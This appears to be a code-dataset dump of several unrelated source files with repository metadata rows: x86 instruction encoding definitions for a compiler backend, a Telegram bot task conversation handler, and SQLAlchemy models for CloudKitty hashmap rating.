enc_x86_64_instp(base.istore32_complex, recipe, stcomplexp, 0x89)
enc_both_instp(base.istore16_complex.i32, recipe, stcomplexp, 0x66, 0x89)
enc_x86_64_instp(base.istore16_complex.i64, recipe, stcomplexp, 0x66, 0x89)
for recipe in [r.stWithIndex_abcd,
r.stWithIndexDisp8_abcd,
r.stWithIndexDisp32_abcd]:
enc_both_instp(base.istore8_complex.i32, recipe, stcomplexp, 0x88)
enc_x86_64_instp(base.istore8_complex.i64, recipe, stcomplexp, 0x88)
for recipe in [r.st, r.stDisp8, r.stDisp32]:
enc_i32_i64_ld_st(base.store, True, recipe, 0x89)
enc_x86_64(base.istore32.i64.any, recipe, 0x89)
enc_i32_i64_ld_st(base.istore16, False, recipe, 0x66, 0x89)
# Byte stores are more complicated because the registers they can address
# depends of the presence of a REX prefix. The st*_abcd recipes fall back to
# the corresponding st* recipes when a REX prefix is applied.
for recipe in [r.st_abcd, r.stDisp8_abcd, r.stDisp32_abcd]:
enc_both(base.istore8.i32.any, recipe, 0x88)
enc_x86_64(base.istore8.i64.any, recipe, 0x88)
enc_i32_i64(base.spill, r.spillSib32, 0x89)
enc_i32_i64(base.regspill, r.regspill32, 0x89)
# Use a 32-bit write for spilling `b1`, `i8` and `i16` to avoid
# constraining the permitted registers.
# See MIN_SPILL_SLOT_SIZE which makes this safe.
for ty in [types.b1, types.i8, types.i16]:
enc_both(base.spill.bind(ty), r.spillSib32, 0x89)
enc_both(base.regspill.bind(ty), r.regspill32, 0x89)
for recipe in [r.ld, r.ldDisp8, r.ldDisp32]:
enc_i32_i64_ld_st(base.load, True, recipe, 0x8b)
enc_x86_64(base.uload32.i64, recipe, 0x8b)
X86_64.enc(base.sload32.i64, *recipe.rex(0x63, w=1))
enc_i32_i64_ld_st(base.uload16, True, recipe, 0x0f, 0xb7)
enc_i32_i64_ld_st(base.sload16, True, recipe, 0x0f, 0xbf)
enc_i32_i64_ld_st(base.uload8, True, recipe, 0x0f, 0xb6)
enc_i32_i64_ld_st(base.sload8, True, recipe, 0x0f, 0xbe)
enc_i32_i64(base.fill, r.fillSib32, 0x8b)
enc_i32_i64(base.regfill, r.regfill32, 0x8b)
# Load 32 bits from `b1`, `i8` and `i16` spill slots. See `spill.b1` above.
for ty in [types.b1, types.i8, types.i16]:
enc_both(base.fill.bind(ty), r.fillSib32, 0x8b)
enc_both(base.regfill.bind(ty), r.regfill32, 0x8b)
# Push and Pop
X86_32.enc(x86.push.i32, *r.pushq(0x50))
enc_x86_64(x86.push.i64, r.pushq, 0x50)
X86_32.enc(x86.pop.i32, *r.popq(0x58))
enc_x86_64(x86.pop.i64, r.popq, 0x58)
# Copy Special
# For x86-64, only define REX forms for now, since we can't describe the
# special regunit immediate operands with the current constraint language.
X86_64.enc(base.copy_special, *r.copysp.rex(0x89, w=1))
X86_32.enc(base.copy_special, *r.copysp(0x89))
# Adjust SP down by a dynamic value (or up, with a negative operand).
X86_32.enc(base.adjust_sp_down.i32, *r.adjustsp(0x29))
X86_64.enc(base.adjust_sp_down.i64, *r.adjustsp.rex(0x29, w=1))
# Adjust SP up by an immediate (or down, with a negative immediate)
X86_32.enc(base.adjust_sp_up_imm, *r.adjustsp_ib(0x83))
X86_32.enc(base.adjust_sp_up_imm, *r.adjustsp_id(0x81))
X86_64.enc(base.adjust_sp_up_imm, *r.adjustsp_ib.rex(0x83, w=1))
X86_64.enc(base.adjust_sp_up_imm, *r.adjustsp_id.rex(0x81, w=1))
# Adjust SP down by an immediate (or up, with a negative immediate)
X86_32.enc(base.adjust_sp_down_imm, *r.adjustsp_ib(0x83, rrr=5))
X86_32.enc(base.adjust_sp_down_imm, *r.adjustsp_id(0x81, rrr=5))
X86_64.enc(base.adjust_sp_down_imm, *r.adjustsp_ib.rex(0x83, rrr=5, w=1))
X86_64.enc(base.adjust_sp_down_imm, *r.adjustsp_id.rex(0x81, rrr=5, w=1))
#
# Float loads and stores.
#
enc_both(base.load.f32.any, r.fld, 0xf3, 0x0f, 0x10)
enc_both(base.load.f32.any, r.fldDisp8, 0xf3, 0x0f, 0x10)
enc_both(base.load.f32.any, r.fldDisp32, 0xf3, 0x0f, 0x10)
enc_both(base.load_complex.f32, r.fldWithIndex, 0xf3, 0x0f, 0x10)
enc_both(base.load_complex.f32, r.fldWithIndexDisp8, 0xf3, 0x0f, 0x10)
enc_both(base.load_complex.f32, r.fldWithIndexDisp32, 0xf3, 0x0f, 0x10)
enc_both(base.load.f64.any, r.fld, 0xf2, 0x0f, 0x10)
enc_both(base.load.f64.any, r.fldDisp8, 0xf2, 0x0f, 0x10)
enc_both(base.load.f64.any, r.fldDisp32, 0xf2, 0x0f, 0x10)
enc_both(base.load_complex.f64, r.fldWithIndex, 0xf2, 0x0f, 0x10)
enc_both(base.load_complex.f64, r.fldWithIndexDisp8, 0xf2, 0x0f, 0x10)
enc_both(base.load_complex.f64, r.fldWithIndexDisp32, 0xf2, 0x0f, 0x10)
enc_both(base.store.f32.any, r.fst, 0xf3, 0x0f, 0x11)
enc_both(base.store.f32.any, r.fstDisp8, 0xf3, 0x0f, 0x11)
enc_both(base.store.f32.any, r.fstDisp32, 0xf3, 0x0f, 0x11)
enc_both(base.store_complex.f32, r.fstWithIndex, 0xf3, 0x0f, 0x11)
enc_both(base.store_complex.f32, r.fstWithIndexDisp8, 0xf3, 0x0f, 0x11)
enc_both(base.store_complex.f32, r.fstWithIndexDisp32, 0xf3, 0x0f, 0x11)
enc_both(base.store.f64.any, r.fst, 0xf2, 0x0f, 0x11)
enc_both(base.store.f64.any, r.fstDisp8, 0xf2, 0x0f, 0x11)
enc_both(base.store.f64.any, r.fstDisp32, 0xf2, 0x0f, 0x11)
enc_both(base.store_complex.f64, r.fstWithIndex, 0xf2, 0x0f, 0x11)
enc_both(base.store_complex.f64, r.fstWithIndexDisp8, 0xf2, 0x0f, 0x11)
enc_both(base.store_complex.f64, r.fstWithIndexDisp32, 0xf2, 0x0f, 0x11)
enc_both(base.fill.f32, r.ffillSib32, 0xf3, 0x0f, 0x10)
enc_both(base.regfill.f32, r.fregfill32, 0xf3, 0x0f, 0x10)
enc_both(base.fill.f64, r.ffillSib32, 0xf2, 0x0f, 0x10)
enc_both(base.regfill.f64, r.fregfill32, 0xf2, 0x0f, 0x10)
enc_both(base.spill.f32, r.fspillSib32, 0xf3, 0x0f, 0x11)
enc_both(base.regspill.f32, r.fregspill32, 0xf3, 0x0f, 0x11)
enc_both(base.spill.f64, r.fspillSib32, 0xf2, 0x0f, 0x11)
enc_both(base.regspill.f64, r.fregspill32, 0xf2, 0x0f, 0x11)
#
# Function addresses.
#
# Non-PIC, all-ones funcaddresses.
X86_32.enc(base.func_addr.i32, *r.fnaddr4(0xb8),
isap=not_all_ones_funcaddrs_and_not_is_pic)
X86_64.enc(base.func_addr.i64, *r.fnaddr8.rex(0xb8, w=1),
isap=not_all_ones_funcaddrs_and_not_is_pic)
# Non-PIC, all-zeros funcaddresses.
X86_32.enc(base.func_addr.i32, *r.allones_fnaddr4(0xb8),
isap=all_ones_funcaddrs_and_not_is_pic)
X86_64.enc(base.func_addr.i64, *r.allones_fnaddr8.rex(0xb8, w=1),
isap=all_ones_funcaddrs_and_not_is_pic)
# 64-bit, colocated, both PIC and non-PIC. Use the lea instruction's
# pc-relative field.
X86_64.enc(base.func_addr.i64, *r.pcrel_fnaddr8.rex(0x8d, w=1),
instp=IsColocatedFunc(FuncAddr.func_ref))
# 64-bit, non-colocated, PIC.
X86_64.enc(base.func_addr.i64, *r.got_fnaddr8.rex(0x8b, w=1),
isap=is_pic)
#
# Global addresses.
#
# Non-PIC
X86_32.enc(base.symbol_value.i32, *r.gvaddr4(0xb8),
isap=not_is_pic)
X86_64.enc(base.symbol_value.i64, *r.gvaddr8.rex(0xb8, w=1),
isap=not_is_pic)
# PIC, colocated
X86_64.enc(base.symbol_value.i64, *r.pcrel_gvaddr8.rex(0x8d, w=1),
isap=is_pic,
instp=IsColocatedData())
# PIC, non-colocated
X86_64.enc(base.symbol_value.i64, *r.got_gvaddr8.rex(0x8b, w=1),
isap=is_pic)
#
# Stack addresses.
#
# TODO: Add encoding rules for stack_load and stack_store, so that they
# don't get legalized to stack_addr + load/store.
#
X86_32.enc(base.stack_addr.i32, *r.spaddr4_id(0x8d))
X86_64.enc(base.stack_addr.i64, *r.spaddr8_id.rex(0x8d, w=1))
#
# Call/return
#
# 32-bit, both PIC and non-PIC.
X86_32.enc(base.call, *r.call_id(0xe8))
# 64-bit, colocated, both PIC and non-PIC. Use the call instruction's
# pc-relative field.
X86_64.enc(base.call, *r.call_id(0xe8),
instp=IsColocatedFunc(Call.func_ref))
# 64-bit, non-colocated, PIC. There is no 64-bit non-colocated non-PIC version,
# since non-PIC is currently using the large model, which requires calls be
# lowered to func_addr+call_indirect.
X86_64.enc(base.call, *r.call_plt_id(0xe8), isap=is_pic)
X86_32.enc(base.call_indirect.i32, *r.call_r(0xff, rrr=2))
X86_64.enc(base.call_indirect.i64, *r.call_r.rex(0xff, rrr=2))
X86_64.enc(base.call_indirect.i64, *r.call_r(0xff, rrr=2))
X86_32.enc(base.x_return, *r.ret(0xc3))
X86_64.enc(base.x_return, *r.ret(0xc3))
#
# Branches
#
enc_both(base.jump, r.jmpb, 0xeb)
enc_both(base.jump, r.jmpd, 0xe9)
enc_both(base.brif, r.brib, 0x70)
enc_both(base.brif, r.brid, 0x0f, 0x80)
# Not all float condition codes are legal, see `supported_floatccs`.
enc_both(base.brff, r.brfb, 0x70)
enc_both(base.brff, r.brfd, 0x0f, 0x80)
# Note that the tjccd opcode will be prefixed with 0x0f.
enc_i32_i64(base.brz, r.tjccb, 0x74)
enc_i32_i64(base.brz, r.tjccd, 0x84)
enc_i32_i64(base.brnz, r.tjccb, 0x75)
enc_i32_i64(base.brnz, r.tjccd, 0x85)
# Branch on a b1 value in a register only looks at the low 8 bits. See also
# bint encodings below.
#
# Start with the worst-case encoding for X86_32 only. The register allocator
# can't handle a branch with an ABCD-constrained operand.
X86_32.enc(base.brz.b1, *r.t8jccd_long(0x84))
X86_32.enc(base.brnz.b1, *r.t8jccd_long(0x85))
enc_both(base.brz.b1, r.t8jccb_abcd, 0x74)
enc_both(base.brz.b1, r.t8jccd_abcd, 0x84)
enc_both(base.brnz.b1, r.t8jccb_abcd, 0x75)
enc_both(base.brnz.b1, r.t8jccd_abcd, 0x85)
#
# Jump tables
#
X86_64.enc(base.jump_table_entry.i64.any.any, *r.jt_entry.rex(0x63, w=1))
X86_32.enc(base.jump_table_entry.i32.any.any, *r.jt_entry(0x8b))
X86_64.enc(base.jump_table_base.i64, *r.jt_base.rex(0x8d, w=1))
X86_32.enc(base.jump_table_base.i32, *r.jt_base(0x8d))
enc_x86_64(base.indirect_jump_table_br.i64, r.indirect_jmp, 0xff, rrr=4)
X86_32.enc(base.indirect_jump_table_br.i32, *r.indirect_jmp(0xff, rrr=4))
#
# Trap as ud2
#
X86_32.enc(base.trap, *r.trap(0x0f, 0x0b))
X86_64.enc(base.trap, *r.trap(0x0f, 0x0b))
# Debug trap as int3
X86_32.enc(base.debugtrap, r.debugtrap, 0)
X86_64.enc(base.debugtrap, r.debugtrap, 0)
# Using a standard EncRecipe, not the TailRecipe.
X86_32.enc(base.trapif, r.trapif, 0)
X86_64.enc(base.trapif, r.trapif, 0)
X86_32.enc(base.trapff, r.trapff, 0)
X86_64.enc(base.trapff, r.trapff, 0)
#
# Comparisons
#
enc_i32_i64(base.icmp, r.icscc, 0x39)
enc_i32_i64(base.icmp_imm, r.icscc_ib, 0x83, rrr=7)
enc_i32_i64(base.icmp_imm, r.icscc_id, 0x81, rrr=7)
enc_i32_i64(base.ifcmp, r.rcmp, 0x39)
enc_i32_i64(base.ifcmp_imm, r.rcmp_ib, 0x83, rrr=7)
enc_i32_i64(base.ifcmp_imm, r.rcmp_id, 0x81, rrr=7)
# TODO: We could special-case ifcmp_imm(x, 0) to TEST(x, x).
X86_32.enc(base.ifcmp_sp.i32, *r.rcmp_sp(0x39))
X86_64.enc(base.ifcmp_sp.i64, *r.rcmp_sp.rex(0x39, w=1))
#
# Convert flags to bool.
#
# This encodes `b1` as an 8-bit low register with the value 0 or 1.
enc_both(base.trueif, r.seti_abcd, 0x0f, 0x90)
enc_both(base.trueff, r.setf_abcd, 0x0f, 0x90)
#
# Conditional move (a.k.a integer select)
#
enc_i32_i64(base.selectif, r.cmov, 0x0F, 0x40)
#
# Bit scan forwards and reverse
#
enc_i32_i64(x86.bsf, r.bsf_and_bsr, 0x0F, 0xBC)
enc_i32_i64(x86.bsr, r.bsf_and_bsr, 0x0F, 0xBD)
#
# Convert bool to int.
#
# This assumes that b1 is represented as an 8-bit low register with the value 0
# or 1.
#
# Encode movzbq as movzbl, because it's equivalent and shorter.
X86_32.enc(base.bint.i32.b1, *r.urm_noflags_abcd(0x0f, 0xb6))
X86_64.enc(base.bint.i64.b1, *r.urm_noflags.rex(0x0f, 0xb6))
X86_64.enc(base.bint.i64.b1, *r.urm_noflags_abcd(0x0f, 0xb6))
X86_64.enc(base.bint.i32.b1, *r.urm_noflags.rex(0x0f, 0xb6))
X86_64.enc(base.bint.i32.b1, *r.urm_noflags_abcd(0x0f, 0xb6))
# Numerical conversions.
# Reducing an integer is a no-op.
X86_32.enc(base.ireduce.i8.i16, r.null, 0)
X86_32.enc(base.ireduce.i8.i32, r.null, 0)
X86_32.enc(base.ireduce.i16.i32, r.null, 0)
X86_64.enc(base.ireduce.i8.i16, r.null, 0)
X86_64.enc(base.ireduce.i8.i32, r.null, 0)
X86_64.enc(base.ireduce.i16.i32, r.null, 0)
X86_64.enc(base.ireduce.i8.i64, r.null, 0)
X86_64.enc(base.ireduce.i16.i64, r.null, 0)
X86_64.enc(base.ireduce.i32.i64, r.null, 0)
# TODO: Add encodings for cbw, cwde, cdqe, which are sign-extending
# instructions for %al/%ax/%eax to %ax/%eax/%rax.
# movsbl
X86_32.enc(base.sextend.i32.i8, *r.urm_noflags_abcd(0x0f, 0xbe))
X86_64.enc(base.sextend.i32.i8, *r.urm_noflags.rex(0x0f, 0xbe))
X86_64.enc(base.sextend.i32.i8, *r.urm_noflags_abcd(0x0f, 0xbe))
# movswl
X86_32.enc(base.sextend.i32.i16, *r.urm_noflags(0x0f, 0xbf))
X86_64.enc(base.sextend.i32.i16, *r.urm_noflags.rex(0x0f, 0xbf))
X86_64.enc(base.sextend.i32.i16, *r.urm_noflags(0x0f, 0xbf))
# movsbq
X86_64.enc(base.sextend.i64.i8, *r.urm_noflags.rex(0x0f, 0xbe, w=1))
# movswq
X86_64.enc(base.sextend.i64.i16, *r.urm_noflags.rex(0x0f, 0xbf, w=1))
# movslq
X86_64.enc(base.sextend.i64.i32, *r.urm_noflags.rex(0x63, w=1))
# movzbl
X86_32.enc(base.uextend.i32.i8, *r.urm_noflags_abcd(0x0f, 0xb6))
X86_64.enc(base.uextend.i32.i8, *r.urm_noflags.rex(0x0f, 0xb6))
X86_64.enc(base.uextend.i32.i8, *r.urm_noflags_abcd(0x0f, 0xb6))
# movzwl
X86_32.enc(base.uextend.i32.i16, *r.urm_noflags(0x0f, 0xb7))
X86_64.enc(base.uextend.i32.i16, *r.urm_noflags.rex(0x0f, 0xb7))
X86_64.enc(base.uextend.i32.i16, *r.urm_noflags(0x0f, 0xb7))
# movzbq, encoded as movzbl because it's equivalent and shorter
X86_64.enc(base.uextend.i64.i8, *r.urm_noflags.rex(0x0f, 0xb6))
X86_64.enc(base.uextend.i64.i8, *r.urm_noflags_abcd(0x0f, 0xb6))
# movzwq, encoded as movzwl because it's equivalent and shorter
X86_64.enc(base.uextend.i64.i16, *r.urm_noflags.rex(0x0f, 0xb7))
X86_64.enc(base.uextend.i64.i16, *r.urm_noflags(0x0f, 0xb7))
# A 32-bit register copy clears the high 32 bits.
X86_64.enc(base.uextend.i64.i32, *r.umr.rex(0x89))
X86_64.enc(base.uextend.i64.i32, *r.umr(0x89))
#
# Floating point
#
# floating-point constants equal to 0.0 can be encoded using either
# `xorps` or `xorpd`, for 32-bit and 64-bit floats respectively.
X86_32.enc(base.f32const, *r.f32imm_z(0x0f, 0x57),
instp=IsZero32BitFloat(UnaryIeee32.imm))
X86_32.enc(base.f64const, *r.f64imm_z(0x66, 0x0f, 0x57),
instp=IsZero64BitFloat(UnaryIeee64.imm))
enc_x86_64_instp(base.f32const, r.f32imm_z,
IsZero32BitFloat(UnaryIeee32.imm), 0x0f, 0x57)
enc_x86_64_instp(base.f64const, r.f64imm_z,
IsZero64BitFloat(UnaryIeee64.imm), 0x66, 0x0f, 0x57)
# movd
enc_both(base.bitcast.f32.i32, r.frurm, 0x66, 0x0f, 0x6e)
enc_both(base.bitcast.i32.f32, r.rfumr, 0x66, 0x0f, 0x7e)
# movq
X86_64.enc(base.bitcast.f64.i64, *r.frurm.rex(0x66, 0x0f, 0x6e, w=1))
X86_64.enc(base.bitcast.i64.f64, *r.rfumr.rex(0x66, 0x0f, 0x7e, w=1))
# movaps
enc_both(base.copy.f32, r.furm, 0x0f, 0x28)
enc_both(base.copy.f64, r.furm, 0x0f, 0x28)
# For x86-64, only define REX forms for now, since we can't describe the
# special regunit immediate operands with the current constraint language.
X86_32.enc(base.regmove.f32, *r.frmov(0x0f, 0x28))
X86_64.enc(base.regmove.f32, *r.frmov.rex(0x0f, 0x28))
# For x86-64, only define REX forms for now, since we can't describe the
# special regunit immediate operands with the current constraint language.
X86_32.enc(base.regmove.f64, *r.frmov(0x0f, 0x28))
X86_64.enc(base.regmove.f64, *r.frmov.rex(0x0f, 0x28))
# cvtsi2ss
enc_i32_i64(base.fcvt_from_sint.f32, r.frurm, 0xf3, 0x0f, 0x2a)
# cvtsi2sd
enc_i32_i64(base.fcvt_from_sint.f64, r.frurm, 0xf2, 0x0f, 0x2a)
# cvtss2sd
enc_both(base.fpromote.f64.f32, r.furm, 0xf3, 0x0f, 0x5a)
# cvtsd2ss
enc_both(base.fdemote.f32.f64, r.furm, 0xf2, 0x0f, 0x5a)
# cvttss2si
enc_both(x86.cvtt2si.i32.f32, r.rfurm, 0xf3, 0x0f, 0x2c)
X86_64.enc(x86.cvtt2si.i64.f32, *r.rfurm.rex(0xf3, 0x0f, 0x2c, w=1))
# cvttsd2si
enc_both(x86.cvtt2si.i32.f64, r.rfurm, 0xf2, 0x0f, 0x2c)
X86_64.enc(x86.cvtt2si.i64.f64, *r.rfurm.rex(0xf2, 0x0f, 0x2c, w=1))
# Exact square roots.
enc_both(base.sqrt.f32, r.furm, 0xf3, 0x0f, 0x51)
enc_both(base.sqrt.f64, r.furm, 0xf2, 0x0f, 0x51)
# Rounding. The recipe looks at the opcode to pick an immediate.
for inst in [
base.nearest,
base.floor,
base.ceil,
base.trunc]:
enc_both(inst.f32, r.furmi_rnd, 0x66, 0x0f, 0x3a, 0x0a, isap=use_sse41)
enc_both(inst.f64, r.furmi_rnd, 0x66, 0x0f, 0x3a, 0x0b, isap=use_sse41)
# Binary arithmetic ops.
for inst, opc in [
(base.fadd, 0x58),
(base.fsub, 0x5c),
(base.fmul, 0x59),
(base.fdiv, 0x5e),
(x86.fmin, 0x5d),
(x86.fmax, 0x5f)]:
enc_both(inst.f32, r.fa, 0xf3, 0x0f, opc)
enc_both(inst.f64, r.fa, 0xf2, 0x0f, opc)
# Binary bitwise ops.
for inst, opc in [
(base.band, 0x54),
(base.bor, 0x56),
(base.bxor, 0x57)]:
enc_both(inst.f32, r.fa, 0x0f, opc)
enc_both(inst.f64, r.fa, 0x0f, opc)
# The `andnps(x,y)` instruction computes `~x&y`, while band_not(x,y)` is `x&~y.
enc_both(base.band_not.f32, r.fax, 0x0f, 0x55)
enc_both(base.band_not.f64, r.fax, 0x0f, 0x55)
# Comparisons.
#
# This only covers the condition codes in `supported_floatccs`, the rest are
# handled by legalization patterns.
enc_both(base.fcmp.f32, r.fcscc, 0x0f, 0x2e)
enc_both(base.fcmp.f64, r.fcscc, 0x66, 0x0f, 0x2e)
enc_both(base.ffcmp.f32, r.fcmp, 0x0f, 0x2e)
enc_both(base.ffcmp.f64, r.fcmp, 0x66, 0x0f, 0x2e)
| 36.135819 | 79 | 0.712027 |
50a31a1c09aa002260757b7c74d5c46a730e8184 | 1,337 | py | Python | conversations/handlers/add_task.py | dattatreya303/round_robin_tasker | 74b031322ef1ca59072486c5c7d0d98e59bc62c3 | [
"MIT"
] | null | null | null | conversations/handlers/add_task.py | dattatreya303/round_robin_tasker | 74b031322ef1ca59072486c5c7d0d98e59bc62c3 | [
"MIT"
] | 4 | 2020-08-03T15:50:48.000Z | 2020-11-01T06:05:38.000Z | conversations/handlers/add_task.py | dattatreya303/round_robin_tasker | 74b031322ef1ca59072486c5c7d0d98e59bc62c3 | [
"MIT"
] | null | null | null | from telegram.ext import ConversationHandler, CommandHandler, MessageHandler, Filters
from conversations.callbacks.add_task import add_task_conv_start, add_task_conv_ask_name, \
add_task_conv_ask_participants
from conversations.commands import MainCommands
from conversations.common import TIMEOUT_DURATION
from conversations.handlers.common import TIMEOUT_HANDLER, CANCEL_HANDLER, INVALID_COMMAND_HANDLER
from conversations.states import AddTaskConvState
ADD_TASK_START_HANDLER = CommandHandler(MainCommands.ADD_TASK.value, add_task_conv_start)
ADD_TASK_ASK_NAME_HANDLER = MessageHandler(filters=Filters.text & ~Filters.command, callback=add_task_conv_ask_name)
ADD_TASK_ASK_PARTICIPANTS_HANDLER = MessageHandler(filters=Filters.text & ~Filters.command,
callback=add_task_conv_ask_participants)
ADD_TASK_CONVERSATION_HANDLER = ConversationHandler(
name='add_task_conv',
entry_points=[ADD_TASK_START_HANDLER],
states={
AddTaskConvState.ASK_NAME: [ADD_TASK_ASK_NAME_HANDLER],
AddTaskConvState.ASK_PARTICIPANTS: [ADD_TASK_ASK_PARTICIPANTS_HANDLER],
ConversationHandler.TIMEOUT: [TIMEOUT_HANDLER]
},
fallbacks=[CANCEL_HANDLER, INVALID_COMMAND_HANDLER],
per_chat=True,
per_user=False,
conversation_timeout=TIMEOUT_DURATION
)
| 44.566667 | 116 | 0.802543 |
2cb5c65df4cfca25feb4e40871ffdf9da12ca65d | 10,805 | py | Python | cloudkitty/rating/hash/db/sqlalchemy/models.py | sreenathmenon/cloudkitty-0.5.1d39 | c26b8c9ad9e40ab17cab54378117efaae7af5eff | [
"Apache-2.0"
] | null | null | null | cloudkitty/rating/hash/db/sqlalchemy/models.py | sreenathmenon/cloudkitty-0.5.1d39 | c26b8c9ad9e40ab17cab54378117efaae7af5eff | [
"Apache-2.0"
] | null | null | null | cloudkitty/rating/hash/db/sqlalchemy/models.py | sreenathmenon/cloudkitty-0.5.1d39 | c26b8c9ad9e40ab17cab54378117efaae7af5eff | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright 2014 Objectif Libre
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# @author: Stéphane Albert
#
from oslo_db.sqlalchemy import models
import sqlalchemy
from sqlalchemy.ext import declarative
from sqlalchemy import orm
from sqlalchemy import schema
Base = declarative.declarative_base()
class HashMapBase(models.ModelBase):
__table_args__ = {'mysql_charset': "utf8",
'mysql_engine': "InnoDB"}
fk_to_resolve = {}
def save(self, session=None):
from cloudkitty import db
if session is None:
session = db.get_session()
super(HashMapBase, self).save(session=session)
def as_dict(self):
d = {}
for c in self.__table__.columns:
if c.name == 'id':
continue
d[c.name] = self[c.name]
return d
def _recursive_resolve(self, path):
obj = self
for attr in path.split('.'):
if hasattr(obj, attr):
obj = getattr(obj, attr)
else:
return None
return obj
def export_model(self):
res = self.as_dict()
for fk, mapping in self.fk_to_resolve.items():
res[fk] = self._recursive_resolve(mapping)
return res
class HashMapService(Base, HashMapBase):
"""An hashmap service.
"""
__tablename__ = 'hashmap_services'
id = sqlalchemy.Column(sqlalchemy.Integer,
primary_key=True)
service_id = sqlalchemy.Column(sqlalchemy.String(36),
nullable=False,
unique=True)
name = sqlalchemy.Column(
sqlalchemy.String(255),
nullable=False,
unique=True)
fields = orm.relationship('HashMapField',
backref=orm.backref(
'service',
lazy='immediate'))
mappings = orm.relationship('HashMapMapping',
backref=orm.backref(
'service',
lazy='immediate'))
thresholds = orm.relationship('HashMapThreshold',
backref=orm.backref(
'service',
lazy='immediate'))
def __repr__(self):
return ('<HashMapService[{uuid}]: '
'service={service}>').format(
uuid=self.service_id,
service=self.name)
class HashMapField(Base, HashMapBase):
"""An hashmap field.
"""
__tablename__ = 'hashmap_fields'
fk_to_resolve = {'service_id': 'service.service_id'}
@declarative.declared_attr
def __table_args__(cls):
args = (schema.UniqueConstraint('field_id', 'name',
name='uniq_field'),
schema.UniqueConstraint('service_id', 'name',
name='uniq_map_service_field'),
HashMapBase.__table_args__,)
return args
id = sqlalchemy.Column(sqlalchemy.Integer,
primary_key=True)
field_id = sqlalchemy.Column(sqlalchemy.String(36),
nullable=False,
unique=True)
name = sqlalchemy.Column(sqlalchemy.String(255),
nullable=False)
service_id = sqlalchemy.Column(
sqlalchemy.Integer,
sqlalchemy.ForeignKey('hashmap_services.id',
ondelete='CASCADE'),
nullable=False)
mappings = orm.relationship('HashMapMapping',
backref=orm.backref(
'field',
lazy='immediate'))
thresholds = orm.relationship('HashMapThreshold',
backref=orm.backref(
'field',
lazy='immediate'))
def __repr__(self):
return ('<HashMapField[{uuid}]: '
'field={field}>').format(
uuid=self.field_id,
field=self.name)
class HashMapGroup(Base, HashMapBase):
"""A grouping of hashmap calculations.
"""
__tablename__ = 'hashmap_groups'
id = sqlalchemy.Column(sqlalchemy.Integer,
primary_key=True)
group_id = sqlalchemy.Column(sqlalchemy.String(36),
nullable=False,
unique=True)
name = sqlalchemy.Column(sqlalchemy.String(255),
nullable=False,
unique=True)
mappings = orm.relationship('HashMapMapping',
backref=orm.backref(
'group',
lazy='immediate'))
thresholds = orm.relationship('HashMapThreshold',
backref=orm.backref(
'group',
lazy='immediate'))
def __repr__(self):
return ('<HashMapGroup[{uuid}]: '
'name={name}>').format(
uuid=self.group_id,
name=self.name)
class HashMapMapping(Base, HashMapBase):
"""A mapping between a field a value and a type.
"""
__tablename__ = 'hashmap_maps'
fk_to_resolve = {'service_id': 'service.service_id',
'field_id': 'field.field_id',
'group_id': 'group.group_id'}
@declarative.declared_attr
def __table_args__(cls):
args = (schema.UniqueConstraint('value', 'field_id',
name='uniq_field_mapping'),
schema.UniqueConstraint('value', 'service_id',
name='uniq_service_mapping'),
HashMapBase.__table_args__,)
return args
id = sqlalchemy.Column(sqlalchemy.Integer,
primary_key=True)
mapping_id = sqlalchemy.Column(sqlalchemy.String(36),
nullable=False,
unique=True)
value = sqlalchemy.Column(sqlalchemy.String(255),
nullable=True)
cost = sqlalchemy.Column(sqlalchemy.Numeric(20, 8),
nullable=False)
map_type = sqlalchemy.Column(sqlalchemy.Enum('flat',
'rate',
name='enum_map_type'),
nullable=False)
service_id = sqlalchemy.Column(sqlalchemy.Integer,
sqlalchemy.ForeignKey('hashmap_services.id',
ondelete='CASCADE'),
nullable=True)
field_id = sqlalchemy.Column(sqlalchemy.Integer,
sqlalchemy.ForeignKey('hashmap_fields.id',
ondelete='CASCADE'),
nullable=True)
group_id = sqlalchemy.Column(sqlalchemy.Integer,
sqlalchemy.ForeignKey('hashmap_groups.id',
ondelete='SET NULL'),
nullable=True)
def __repr__(self):
return ('<HashMapMapping[{uuid}]: '
'type={map_type} {value}={cost}>').format(
uuid=self.mapping_id,
map_type=self.map_type,
value=self.value,
cost=self.cost)
class HashMapThreshold(Base, HashMapBase):
"""A threshold matching a service, a field with a level and a type.
"""
__tablename__ = 'hashmap_thresholds'
fk_to_resolve = {'service_id': 'service.service_id',
'field_id': 'field.field_id',
'group_id': 'group.group_id'}
@declarative.declared_attr
def __table_args__(cls):
args = (schema.UniqueConstraint('level', 'field_id',
name='uniq_field_threshold'),
schema.UniqueConstraint('level', 'service_id',
name='uniq_service_threshold'),
HashMapBase.__table_args__,)
return args
id = sqlalchemy.Column(sqlalchemy.Integer,
primary_key=True)
threshold_id = sqlalchemy.Column(sqlalchemy.String(36),
nullable=False,
unique=True)
level = sqlalchemy.Column(sqlalchemy.Numeric(20, 8),
nullable=True)
cost = sqlalchemy.Column(sqlalchemy.Numeric(20, 8),
nullable=False)
map_type = sqlalchemy.Column(sqlalchemy.Enum('flat',
'rate',
name='enum_map_type'),
nullable=False)
service_id = sqlalchemy.Column(sqlalchemy.Integer,
sqlalchemy.ForeignKey('hashmap_services.id',
ondelete='CASCADE'),
nullable=True)
field_id = sqlalchemy.Column(sqlalchemy.Integer,
sqlalchemy.ForeignKey('hashmap_fields.id',
ondelete='CASCADE'),
nullable=True)
group_id = sqlalchemy.Column(sqlalchemy.Integer,
sqlalchemy.ForeignKey('hashmap_groups.id',
ondelete='SET NULL'),
nullable=True)
def __repr__(self):
return ('<HashMapThreshold[{uuid}]: '
'type={map_type} {level}={cost}>').format(
uuid=self.threshold_id,
map_type=self.map_type,
level=self.level,
cost=self.cost)
| 39.00722 | 79 | 0.490514 |
a0754bd03e8968964e19d501ab68a866365e9d03 | 8,577 | py | Python | src/python/driver.py | kmu-bigdata/lambda-refarch-mapreduce | 74eb74aefcb929b2a7542280176b42c947f401bd | [
"MIT-0"
] | 1 | 2020-11-05T10:00:15.000Z | 2020-11-05T10:00:15.000Z | src/python/driver.py | manchann/lambda-refarch-mapreduce | 74eb74aefcb929b2a7542280176b42c947f401bd | [
